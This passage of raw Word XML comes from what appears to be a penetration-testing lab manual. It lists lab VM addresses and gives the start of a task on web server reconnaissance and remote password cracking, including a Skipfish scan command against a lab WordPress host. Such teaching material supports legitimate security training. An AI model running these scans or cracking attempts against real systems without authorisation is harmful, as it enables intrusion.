                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217E83C3" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D91898A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2356215E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="621D1503" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BBEE75" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8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18"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2013"/>
        <w:gridCol w:w="2366"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D02F84" w14:paraId="7EA1D6AF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14B7B43B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6689F7F9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="456"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55FB02AB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="305" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>XP (Opt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19A23397" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D02F84" w14:paraId="16483A80" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B5E592" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="458"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A34DE64" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="458"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39447FB1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13E36938" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="661" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D02F84" w14:paraId="4BCD351A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF8F9F8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499A8525" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F2C591" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47921F72" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A7AF460" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FDB6C0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1558E694" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Network Settings: Nat Network; allow all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VM’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9274F0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Recommendations: Use the latest tools/ softwares (if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CE55E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>If any errors, troubleshoot and record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55181A3E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B3A739" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="4980"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23025C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>detect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unpatched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">flaws, crack remote passwords. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(This task is the initial step to perform any attacks – A foot printing and gathering information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>phase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E564B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE1510A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:ind w:left="840" w:right="1434"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Note: Any available tools of your own choice could be used for this lab. The options on various tools (not limited to) to execute similar kind of task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s is provided for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EEC5A7" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1021430E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: </w:t>
      </w:r>
      <w:r>
        <w:t>Skipfish (Reconn), Uniscan (Server Fingerprinting), httprecon (Server Footprinting), ID Serve (Server Footprinting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67162A14" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585931BB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use Skipfish tool to perform webserver reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5C56C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5403AF0D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Start Wampserver in Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F7870" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2541"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a. Start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wampserver64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Launch the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C3E0C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360538A3" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login Kali Machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A9CBC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:ind w:right="1437"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use Skipfish and target the wordpress website. (Prior to this, Wordpress website should have been setup/ configured in Windows Server as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> http:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t>/localhost:8080/wordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) – If not done, please do it before starting this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B91C5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Type the following command: skipfish –o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/home/Desktop/skiout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453F241" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1972"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/usr/share/skipfish/dictionaries/complete.wl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t>http://10.0.2.10:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03819C18" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
